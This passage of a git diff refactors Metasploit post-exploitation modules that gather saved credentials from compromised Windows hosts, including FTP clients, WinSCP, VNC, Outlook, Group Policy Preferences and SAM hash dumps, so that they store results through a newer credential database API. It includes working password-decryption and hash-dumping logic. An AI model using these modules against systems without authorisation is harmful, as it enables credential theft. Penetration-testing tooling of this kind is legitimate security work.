-        :pass => config['admin_pass'],
-        :type => "password",
-        :source_id => source_id,
-        :source_type => "exploit",
-        :target_host => config['admin_bindip'],
-        :target_port => config['admin_port']
-      )
+      service_data = {
+          address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+          port: config['admin_port'],
+          service_name: 'filezilla-admin',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          private_type: :password,
+          private_data: config['admin_pass'],
+          username: 'admin'
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data ={
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
     end
 
     p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb
index 8ba708d458..dcea51d68e 100644
--- a/modules/post/windows/gather/credentials/flashfxp.rb
+++ b/modules/post/windows/gather/credentials/flashfxp.rb
@@ -84,19 +84,32 @@ class Metasploit3 < Msf::Post
         passwd = decrypt(epass)
 
         print_good("*** Host: #{host} Port: #{port} User: #{username}  Password: #{passwd} ***")
-        if session.db_record
-          source_id = session.db_record.id
-        else
-          source_id = nil
-        end
-        report_auth_info(
-          :host  => host,
-          :port => port,
-          :sname => 'ftp',
-          :source_id => source_id,
-          :source_type => "exploit",
-          :user => username,
-          :pass => passwd)
+        service_data = {
+          address: Rex::Socket.getaddress(host),
+          port: port,
+          protocol: "tcp",
+          service_name: "ftp",
+          workspace_id: myworkspace_id
+        }
+
+        credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          username: username,
+          private_data: passwd,
+          private_type: :password
+        }
+
+        credential_core = create_credential(credential_data.merge(service_data))
+
+        login_data = {
+          core: credential_core,
+          access_level: "User",
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        create_credential_login(login_data.merge(service_data))
       end
     rescue
       print_status("Either could not find or could not open file #{filename}")
diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb
index f232b8d85d..cc45ed4249 100644
--- a/modules/post/windows/gather/credentials/ftpnavigator.rb
+++ b/modules/post/windows/gather/credentials/ftpnavigator.rb
@@ -67,20 +67,32 @@ class Metasploit3 < Msf::Post
       end
 
       print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
-      if session.db_record
-        source_id = session.db_record.id
-      else
-        source_id = nil
-      end
-      report_auth_info(
-        :host  => server,
-        :port => port,
-        :sname => 'ftp',
-        :source_id => source_id,
-        :source_type => "exploit",
-        :user => username,
-        :pass => dpass
-      )
+      service_data = {
+        address: Rex::Socket.getaddress(server),
+        port: port,
+        protocol: "tcp",
+        service_name: "ftp",
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: username,
+        private_data: dpass,
+        private_type: :password
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
     end
   end
 
diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb
index 49b8e01e9b..18bafd9d9c 100644
--- a/modules/post/windows/gather/credentials/ftpx.rb
+++ b/modules/post/windows/gather/credentials/ftpx.rb
@@ -72,19 +72,32 @@ class Metasploit3 < Msf::Post
       print_good("#{session.sock.peerhost}:#{port} (#{host}) - '#{user}:#{pass}'")
 
       # save results to the db
-      if session.db_record
-        source_id = session.db_record.id
-      else
-        source_id = nil
-      end
-      report_auth_info(
-        :host        => host,
-        :port        => port,
-        :source_id   => source_id,
-        :source_type => "exploit",
-        :user        => user,
-        :pass        => pass
-      )
+      service_data = {
+        address: Rex::Socket.getaddress(host),
+        port: port,
+        protocol: "tcp",
+        service_name: "ftp",
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: user,
+        private_data: pass,
+        private_type: :password
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
     end
   end
 
diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb
index f40cf78eba..787226a526 100644
--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -257,24 +257,32 @@ class Metasploit3 < Msf::Post
   end
 
   def report_creds(user, password, disabled)
-    if session.db_record
-      source_id = session.db_record.id
-    else
-      source_id = nil
-    end
+    service_data = {
+      address: session.session_host,
+      port: 445,
+      protocol: "tcp",
+      service_name: "smb",
+      workspace_id: myworkspace_id
+    }
 
-    active = (disabled == 0)
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      username: user,
+      private_data: password,
+      private_type: :password
+    }
 
-    report_auth_info(
-      :host  => session.sock.peerhost,
-      :port => 445,
-      :sname => 'smb',
-      :proto => 'tcp',
-      :source_id => source_id,
-      :source_type => "exploit",
-      :user => user,
-      :pass => password,
-      :active => active)
+    credential_core = create_credential(credential_data.merge(service_data))
+
+    login_data = {
+      core: credential_core,
+      access_level: "User",
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    create_credential_login(login_data.merge(service_data))
   end
 
   def enum_domains
diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb
index bf73a554b8..8b7f83b30c 100644
--- a/modules/post/windows/gather/credentials/mremote.rb
+++ b/modules/post/windows/gather/credentials/mremote.rb
@@ -41,8 +41,10 @@ class Metasploit3 < Msf::Post
 
     grab_user_profiles().each do |user|
       next if user['LocalAppData'] == nil
-      tmpath= user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
+      tmpath  = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'
+      ng_path = user['LocalAppData'] + '\\..\\Roaming\\mRemoteNG\\confCons.xml'
       get_xml(tmpath)
+      get_xml(ng_path)
     end
   end
 
@@ -56,7 +58,7 @@ class Metasploit3 < Msf::Post
       end
       parse_xml(condata)
       print_status("Finished processing #{path}")
-    rescue
+    rescue Rex::Post::Meterpreter::RequestError
       print_status("The file #{path} either could not be read or does not exist")
     end
 
@@ -84,14 +86,44 @@ class Metasploit3 < Msf::Post
       else
         source_id = nil
       end
-      report_auth_info(
-        :host  => host,
-        :port => port,
-        :sname => proto,
-        :source_id => source_id,
-        :source_type => "exploit",
-        :user => user,
-        :pass => pass)
+
+      service_data = {
+        address: host,
+        port: port,
+        service_name: proto,
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        private_type: :password,
+        private_data: pass,
+        username: user
+      }
+
+      unless domain.blank?
+        credential_data[:realm_key]   = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+        credential_data[:realm_value] = domain
+      end
+
+      credential_data.merge!(service_data)
+
+      # Create the Metasploit::Credential::Core object
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data ={
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
     end
   end
 
diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb
index e03448e5e9..7fd3fc0741 100644
--- a/modules/post/windows/gather/credentials/outlook.rb
+++ b/modules/post/windows/gather/credentials/outlook.rb
@@ -54,7 +54,6 @@ class Metasploit3 < Msf::Post
       addr = [mem].pack("V")
       len = [data.length].pack("V")
       ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
-      #print_status("#{ret.inspect}")
       len, addr = ret["pDataOut"].unpack("V2")
     else
       addr = [mem].pack("Q")
@@ -141,7 +140,7 @@ class Metasploit3 < Msf::Post
             pop3_pw.slice!(0,1)
             pass = decrypt_password(pop3_pw)
             print_status("     User Password: #{pass}")
-            # Prepare data for report_auth_info
+            # Prepare data for creds
             got_user_pw = 1
             host = pop3_server
             user = pop3_user
@@ -215,7 +214,7 @@ class Metasploit3 < Msf::Post
             host = http_server_url
             user = http_user
 
-            #Detect 80 or 443 for report_auth_info
+            #Detect 80 or 443 for creds
             http_server_url.downcase!
             if http_server_url.include? "h\x00t\x00t\x00p\x00s"
               portnum = 443
@@ -303,37 +302,61 @@ class Metasploit3 < Msf::Post
         end
 
         if got_user_pw == 1
-          if session.db_record
-            source_id = session.db_record.id
-          else
-            source_id = nil
-          end
-          report_auth_info(
-            :host  => host,
-            :port => portnum,
-            :sname => type,
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => user,
-            :pass => pass)
-          #print_status("CHK report_auth_info: host = #{host}, port= #{portnum}, sname= #{type}, user= #{user}, pass= #{pass}")
+          service_data = {
+            address: Rex::Socket.getaddress(host),
+            port: portnum,
+            protocol: "tcp",
+            service_name: type,
+            workspace_id: myworkspace_id
+          }
+
+          credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            username: user,
+            private_data: pass,
+            private_type: :password
+          }
+
+          credential_core = create_credential(credential_data.merge(service_data))
+
+          login_data = {
+            core: credential_core,
+            access_level: "User",
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+
+          create_credential_login(login_data.merge(service_data))
         end
 
         if smtp_use_auth != nil
-          if session.db_record
-            source_id = session.db_record.id
-          else
-            source_id = nil
-          end
-          report_auth_info(
-            :host  => smtp_server,
-            :port => smtp_port,
-            :sname => "smtp",
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => smtp_user,
-            :pass => smtp_decrypted_password)
-          #print_status("SMTP report_auth_info: host = #{smtp_server}, port= #{smtp_port}, sname= SMTP, user= #{smtp_user}, pass= #{smtp_decrypted_password}")
+          service_data = {
+            address: Rex::Socket.getaddress(smtp_server),
+            port: smtp_port,
+            protocol: "tcp",
+            service_name: "smtp",
+            workspace_id: myworkspace_id
+          }
+
+          credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            username: smtp_user,
+            private_data: smtp_decrypted_password,
+            private_type: :password
+          }
+
+          credential_core = create_credential(credential_data.merge(service_data))
+
+          login_data = {
+            core: credential_core,
+            access_level: "User",
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+
+          create_credential_login(login_data.merge(service_data))
         end
 
         print_status("")
diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb
index d536fd0cc0..9dc2b88b3a 100644
--- a/modules/post/windows/gather/credentials/smartftp.rb
+++ b/modules/post/windows/gather/credentials/smartftp.rb
@@ -109,14 +109,34 @@ class Metasploit3 < Msf::Post
       else
         source_id = nil
       end
-      report_auth_info(
-            :host  => host,
-            :port => port,
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => user,
-            :pass => pass
-          )
+      service_data = {
+          address: host,
+          port: port,
+          service_name: 'ftp',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          private_type: :password,
+          private_data: pass,
+          username: user
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+      login_data ={
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
     end
   end
 
diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb
index ca44143494..8e4b084bff 100644
--- a/modules/post/windows/gather/credentials/sso.rb
+++ b/modules/post/windows/gather/credentials/sso.rb
@@ -101,24 +101,39 @@ class Metasploit3 < Msf::Post
     return if (user.empty? or pass.empty?)
     return if pass.include?("n.a.")
 
-    if session.db_record
-      source_id = session.db_record.id
-    else
-      source_id = nil
+    # Assemble data about the credential objects we will be creating
+    credential_data = {
+      origin_type: :session,
+      post_reference_name: self.refname,
+      private_data: pass,
+      private_type: :password,
+      session_id: session_db_id,
+      username: user,
+      workspace_id: myworkspace_id
+    }
+
+    unless domain.blank?
+      credential_data[:realm_key]   = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+      credential_data[:realm_value] = domain
     end
 
-    report_auth_info(
-      :host  => session.session_host,
-      :port => 445,
-      :sname => 'smb',
-      :proto => 'tcp',
-      :source_id => source_id,
-      :source_type => "exploit",
-      :user => "#{domain}\\#{user}",
-      :pass => pass
-    )
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+      port: 445,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    create_credential_login(login_data)
   end
 
+
   def is_system_user?(user)
     system_users = [
       /^$/,
diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb
index c728cc4e0d..94f077c8bd 100644
--- a/modules/post/windows/gather/credentials/vnc.rb
+++ b/modules/post/windows/gather/credentials/vnc.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
-
+require 'rex/proto/rfb'
 
 class Metasploit3 < Msf::Post
 
@@ -224,37 +224,79 @@ class Metasploit3 < Msf::Post
           e[:port] = 5900
         end
         print_good("#{e[:name]} => #{e[:hash]} => #{e[:pass]} on port: #{e[:port]}")
-        if session.db_record
-          source_id = session.db_record.id
-        else
-          source_id = nil
-        end
-        report_auth_info(
-          :host  => session.sock.peerhost,
-          :sname => 'vnc',
-          :pass  => "#{e[:pass]}",
-          :port => "#{e[:port]}",
-          :source_id => source_id,
-          :source_type => "exploit",
-          :type => 'password'
-        )
+
+        service_data = {
+            address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+            port: e[:port],
+            service_name: 'vnc',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        # Assemble data about the credential objects we will be creating
+        credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            private_type: :password,
+            private_data: "#{e[:pass]}"
+        }
+
+        # Merge the service data into the credential data
+        credential_data.merge!(service_data)
+
+        # Create the Metasploit::Credential::Core object
+        credential_core = create_credential(credential_data)
+
+        # Assemble the options hash for creating the Metasploit::Credential::Login object
+        login_data ={
+            access_level: 'interactive',
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        # Merge in the service data and create our Login
+        login_data.merge!(service_data)
+        login = create_credential_login(login_data)
+
       end
       if e[:viewonly_pass] != nil
         print_good("VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}")
-        if session.db_record
-          source_id = session.db_record.id
-        else
-          source_id = nil
-        end
-        report_auth_info(
-          :host  => session.sock.peerhost,
-          :sname => 'vnc',
-          :viewonly_pass  => "#{e[:viewonly_pass]}",
-          :port => "#{e[:port]}",
-          :source_id => source_id,
-          :source_type => "exploit",
-          :type => 'password_ro'
-        )
+
+        service_data = {
+            address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+            port: e[:port],
+            service_name: 'vnc',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        # Assemble data about the credential objects we will be creating
+        credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            private_type: :password,
+            private_data: "#{e[:viewonly_pass]}"
+        }
+
+        # Merge the service data into the credential data
+        credential_data.merge!(service_data)
+
+        # Create the Metasploit::Credential::Core object
+        credential_core = create_credential(credential_data)
+
+        # Assemble the options hash for creating the Metasploit::Credential::Login object
+        login_data ={
+            access_level: 'view_only',
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        # Merge in the service data and create our Login
+        login_data.merge!(service_data)
+        login = create_credential_login(login_data)
+
       end
     }
     unload_our_hives(userhives)
diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb
index eb76d98a34..61a4ab36d5 100644
--- a/modules/post/windows/gather/credentials/windows_autologin.rb
+++ b/modules/post/windows/gather/credentials/windows_autologin.rb
@@ -42,15 +42,7 @@ class Metasploit3 < Msf::Post
     host_name = sysinfo['Computer']
     print_status("Running against #{host_name} on session #{datastore['SESSION']}")
 
-    creds = Rex::Ui::Text::Table.new(
-      'Header'  => 'Windows AutoLogin Password',
-      'Indent'   => 1,
-      'Columns' => [
-        'UserName',
-        'Password',
-        'Domain'
-      ]
-    )
+    creds = []
 
     has_al = 0
 
@@ -69,7 +61,6 @@ class Metasploit3 < Msf::Post
 
     if do1 != '' and  du1 != '' and dp1 == '' and al == '1'
       has_al = 1
-      dp1 = '[No Password!]'
       creds << [du1,dp1, do1]
       print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
     elsif do1 != '' and  du1 != '' and dp1 != ''
@@ -80,8 +71,7 @@ class Metasploit3 < Msf::Post
 
     if do2 != '' and  du2 != '' and dp2 == '' and al == '1'
       has_al = 1
-      dp2 = '[No Password!]'
-      creds << [du2,dp2,d02]
+      creds << [du2,dp2,do2]
       print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
     elsif do2 != '' and  du2 != '' and dp2 != ''
       has_al = 1
@@ -94,16 +84,18 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    print_status("Storing data...")
-    path = store_loot(
-      'windows.autologin.user.creds',
-      'text/csv',
-      session,
-      creds.to_csv,
-      'windows-autologin-user-creds.csv',
-      'Windows AutoLogin User Credentials'
-    )
-
-    print_status("Windows AutoLogin User Credentials saved in: #{path}")
+    creds.each do |cred|
+      create_credential(
+        workspace_id: myworkspace_id,
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: cred[0],
+        private_data: cred[1],
+        private_type: :password,
+        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+        realm_value: cred[2]
+      )
+    end
   end
 end
diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb
index fc8d61fb18..d2125db5ca 100644
--- a/modules/post/windows/gather/credentials/winscp.rb
+++ b/modules/post/windows/gather/credentials/winscp.rb
@@ -14,6 +14,7 @@ class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
+  include Msf::Post::File
 
   def initialize(info={})
     super(update_info(info,
@@ -72,34 +73,12 @@ class Metasploit3 < Msf::Post
             portnum = 22
           end
 
-          user = registry_getvaldata(active_session, 'UserName') || ""
-          host = registry_getvaldata(active_session, 'HostName') || ""
-          proto = registry_getvaldata(active_session, 'FSProtocol') || ""
-
-          # If no explicit protocol entry exists it is on sFTP with SCP backup. If it is 0
-          # it is set to SCP.
-          if proto == nil or proto == 0
-            proto = "SSH"
-          else
-            proto = "FTP"
-          end
-
-          #Decrypt our password, and report on results
-          pass= decrypt_password(password, user+host)
-          print_status("Host: #{host}  Port: #{portnum} Protocol: #{proto}  Username: #{user}  Password: #{pass}")
-          if session.db_record
-            source_id = session.db_record.id
-          else
-            source_id = nil
-          end
-          report_auth_info(
-            :host  => host,
-            :port => portnum,
-            :sname => proto,
-            :source_id => source_id,
-            :source_type => "exploit",
-            :user => user,
-            :pass => pass
+          winscp_store_config(
+            'FSProtocol' => registry_getvaldata(active_session, 'FSProtocol') || "",
+            'HostName' => registry_getvaldata(active_session, 'HostName') || "",
+            'Password' => password,
+            'PortNumber' => portnum,
+            'UserName' => registry_getvaldata(active_session, 'UserName') || "",
           )
 
         end
@@ -119,65 +98,35 @@ class Metasploit3 < Msf::Post
 
 
   def get_ini(filename)
-    begin
-      #opens the WinSCP.ini file for reading and loads it into the MSF Ini Parser
-      client.fs.file.stat(filename)
-      config = client.fs.file.new(filename,'r')
-      parse = config.read
-      print_status("Found WinSCP.ini file...")
-      ini=Rex::Parser::Ini.from_s(parse)
+    print_error("Looking for #{filename}.")
+    # opens the WinSCP.ini file for reading and loads it into the MSF Ini Parser
+    parse = read_file(filename)
+    if parse.nil?
+      print_error("WinSCP.ini file NOT found...")
+      return
+    end
+
+    print_status("Found WinSCP.ini file...")
+    ini = Rex::Parser::Ini.from_s(parse)
+
+    # if a Master Password is in use we give up
+    if ini['Configuration\\Security']['MasterPassword'] == '1'
+      print_status("Master Password Set, unable to recover saved passwords!")
+      return nil
+    end
+
+    # Runs through each group in the ini file looking for all of the Sessions
+    ini.each_key do |group|
+      if group.include?('Sessions') && ini[group].has_key?('Password')
+        winscp_store_config(
+          'FSProtocol' => ini[group]['FSProtocol'],
+          'HostName' => ini[group]['HostName'],
+          'Password' => ini[group]['Password'],
+          'PortNumber' => ini[group]['PortNumber'] || 22,
+          'UserName' => ini[group]['UserName'],
+        )
 
-      #if a Master Password is in use we give up
-      if ini['Configuration\\Security']['MasterPassword'] == '1'
-        print_status("Master Password Set, unable to recover saved passwords!")
-        return nil
       end
-
-      #Runs through each group in the ini file looking for all of the Sessions
-      ini.each_key do |group|
-        groupkey='Sessions'
-        if group=~/#{groupkey}/
-          #See if we have a password saved in this sessions
-          if ini[group].has_key?('Password')
-            # If no explicit port number is defined, then it is the default tcp 22
-            if ini[group].has_key?('PortNumber')
-              portnum = ini[group]['PortNumber']
-            else
-              portnum = 22
-            end
-            host= ini[group]['HostName']
-            user= ini[group]['UserName']
-            proto = ini[group]['FSProtocol']
-
-            # If no explicit protocol entry exists it is on sFTP with SCP backup. If it
-            # is 0 it is set to SCP.
-            if proto == nil or proto == 0
-              proto = "SSH"
-            else
-              proto = "FTP"
-            end
-            # Decrypt the password and report on all of the results
-            pass= decrypt_password(ini[group]['Password'], user+host)
-            print_status("Host: #{host}  Port: #{portnum} Protocol: #{proto}  Username: #{user}  Password: #{pass}")
-            if session.db_record
-              source_id = session.db_record.id
-            else
-              source_id = nil
-            end
-            report_auth_info(
-              :host  => host,
-              :port => portnum,
-              :sname => proto,
-              :source_id => source_id,
-              :source_type => "exploit",
-              :user => user,
-              :pass => pass
-            )
-          end
-        end
-      end
-    rescue
-      print_status("WinSCP.ini file NOT found...")
     end
   end
 
@@ -186,12 +135,12 @@ class Metasploit3 < Msf::Post
     pwalg_simple_magic = 0xA3
     pwalg_simple_string = "0123456789ABCDEF"
 
-    # Decrypts the next charachter in the password sequence
+    # Decrypts the next character in the password sequence
     if @password.length > 0
       # Takes the first char from the encrypted password and finds its position in the
       # pre-defined string, then left shifts the returned index by 4 bits
       unpack1 = pwalg_simple_string.index(@password[0,1])
-      unpack1= unpack1 << 4
+      unpack1 = unpack1 << 4
 
       # Takes the second char from the encrypted password and finds its position in the
       # pre-defined string
@@ -213,37 +162,76 @@ class Metasploit3 < Msf::Post
     flag = decrypt_next_char()
 
     if flag == pwalg_simple_flag
-      decrypt_next_char();
-      length = decrypt_next_char();
+      decrypt_next_char()
+      length = decrypt_next_char()
     else
-      length = flag;
+      length = flag
     end
-    ldel = (decrypt_next_char())*2 ;
-    @password = @password[ldel,@password.length];
-    result="";
-    for ss in 0...length
-      result+=decrypt_next_char().chr
+    ldel = (decrypt_next_char())*2
+    @password = @password[ldel,@password.length]
+
+    result = ""
+    length.times do
+      result << decrypt_next_char().chr
     end
 
     if flag == pwalg_simple_flag
-      result= result[key.length,result.length];
-
+      result = result[key.length, result.length]
     end
 
-    return result
-
-
+    result
   end
 
   def run
     print_status("Looking for WinSCP.ini file storage...")
-    get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
+    get_ini(expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
     print_status("Looking for Registry Storage...")
     get_reg()
     print_status("Done!")
-
   end
 
+  def winscp_store_config(config)
+    host = config['HostName']
+    pass = config['Password']
+    portnum = config['PortNumber']
+    proto = config['FSProtocol']
+    user = config['UserName']
 
+    sname = case proto.to_i
+            when 5 then "FTP"
+            when 0 then "SSH"
+            end
+
+    # Decrypt our password, and report on results
+    plaintext = decrypt_password(pass, user+host)
+    print_status("Host: #{host}  Port: #{portnum} Protocol: #{sname}  Username: #{user}  Password: #{plaintext}")
+
+    service_data = {
+      # XXX This resolution should happen on the victim side instead
+      address: ::Rex::Socket.getaddress(host),
+      port: portnum,
+      service_name: sname,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      private_type: :password,
+      private_data: plaintext,
+      username: user
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
 
 end
diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb
index ae8cbef726..ff7cd98526 100644
--- a/modules/post/windows/gather/credentials/wsftp_client.rb
+++ b/modules/post/windows/gather/credentials/wsftp_client.rb
@@ -66,19 +66,32 @@ class Metasploit3 < Msf::Post
       next if passwd == nil or passwd == ""
       port = 21 if port == nil
       print_good("Host: #{host} Port: #{port} User: #{username}  Password: #{passwd}")
-      if session.db_record
-        source_id = session.db_record.id
-      else
-        source_id = nil
-      end
-      report_auth_info(
-        :host  => host,
-        :port => port,
-        :sname => 'ftp',
-        :source_id => source_id,
-        :source_type => "exploit",
-        :user => username,
-        :pass => passwd)
+      service_data = {
+        address: Rex::Socket.getaddress(host),
+        port: port,
+        protocol: "tcp",
+        service_name: "ftp",
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: username,
+        private_data: passwd,
+        private_type: :password
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
     end
   end
 
diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb
index 61609abceb..494cc08520 100644
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -66,16 +66,47 @@ class Metasploit3 < Msf::Post
       print_status("Dumping password hashes...")
       print_line()
       print_line()
+
+      # Assemble the information about the SMB service for this host
+      service_data = {
+          address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+          port: 445,
+          service_name: 'smb',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+      }
+
+      # Assemble data about the credential objects we will be creating
+      credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          private_type: :ntlm_hash
+      }
+
+      # Merge the service data into the credential data
+      credential_data.merge!(service_data)
+
       users.keys.sort{|a,b| a<=>b}.each do |rid|
         hashstring = "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::"
-        report_auth_info(
-          :host  => session.sock.peerhost,
-          :port  => 445,
-          :sname => 'smb',
-          :user  => users[rid][:Name].downcase,
-          :pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
-          :type  => "smb_hash"
-        )
+
+        # Add the details for this specific credential
+        credential_data[:private_data] = users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0]
+        credential_data[:username]     = users[rid][:Name].downcase
+
+        # Create the Metasploit::Credential::Core object
+        credential_core = create_credential(credential_data)
+
+        # Assemble the options hash for creating the Metasploit::Credential::Login object
+        login_data ={
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        # Merge in the service data and create our Login
+        login_data.merge!(service_data)
+        login = create_credential_login(login_data)
+
 
         print_line hashstring
       end
diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb
index a3d2797741..726eab46d2 100644
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -247,14 +247,38 @@ class Metasploit3 < Msf::Post
         collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
 
         print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
-        session.framework.db.report_auth_info(
-          :host  => host,
-          :port  => @smb_port,
-          :sname => 'smb',
-          :user  => users[rid][:Name],
-          :pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
-          :type  => "smb_hash"
